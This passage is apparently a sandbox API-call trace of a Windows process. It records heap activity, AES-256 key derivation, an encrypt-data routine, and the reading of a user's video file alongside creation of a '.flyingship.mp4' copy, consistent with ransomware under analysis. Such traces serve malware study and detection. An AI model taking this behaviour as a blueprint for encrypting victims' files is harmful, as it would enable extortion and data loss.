0x90d460 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0192.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.387] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.387] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.388] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.388] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0192.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0192.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.389] CryptDestroyHash (hHash=0x90af58) returned 1 [0192.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0192.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0192.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0192.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0192.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\sq9web5cn_9jducj7p.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.391] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.391] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0192.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0192.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0192.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0192.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0192.393] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0192.393] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0192.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0192.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0192.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0192.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0192.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0192.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0192.396] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p")) returned 0x10 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0192.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\sq9web5cn_9jducj7p.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0192.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0192.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.398] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0192.399] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0192.399] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0192.399] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0192.400] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0192.400] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0192.404] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8cd8, lpOverlapped=0x0) returned 1 [0192.405] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0192.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18cd8) returned 0xbea018 [0192.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0192.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0192.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18cd8) returned 0xa5f008 [0192.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.409] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0192.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0192.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18cd8) returned 0xbea018 [0192.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0192.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.410] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0192.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0192.410] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.410] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.411] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0192.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0192.411] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.411] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0192.411] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.411] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0192.411] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0192.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.411] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c26c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0192.411] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.411] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 